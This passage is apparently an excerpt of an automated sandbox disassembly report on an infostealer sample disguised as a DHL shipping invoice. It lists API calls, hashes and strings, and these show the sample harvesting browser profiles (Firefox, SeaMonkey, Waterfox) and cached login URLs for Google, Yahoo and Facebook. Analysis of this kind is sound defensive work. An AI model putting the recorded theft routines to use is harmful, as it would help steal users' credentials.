                                                                                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                                      • API String ID: 2936932814-4196376884
                                                                                                                                                                                                                                      • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                                                                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                      • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: C:\Windows\system32
                                                                                                                                                                                                                                      • API String ID: 669240632-2896066436
                                                                                                                                                                                                                                      • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                                                                                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                      • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                                      • API String ID: 4039892925-11920434
                                                                                                                                                                                                                                      • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                                                                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                                      • API String ID: 4039892925-2068335096
                                                                                                                                                                                                                                      • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                                                                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                                      • API String ID: 4039892925-3369679110
                                                                                                                                                                                                                                      • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                                                                                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                                      • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                                      • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                                      • String ID: $0.@
                                                                                                                                                                                                                                      • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                                      • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                                                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2941347001-0
                                                                                                                                                                                                                                      • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                                                                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                                      • API String ID: 1534475566-1174173950
                                                                                                                                                                                                                                      • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                                                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                      • API String ID: 71295984-2036018995
                                                                                                                                                                                                                                      • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                                                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
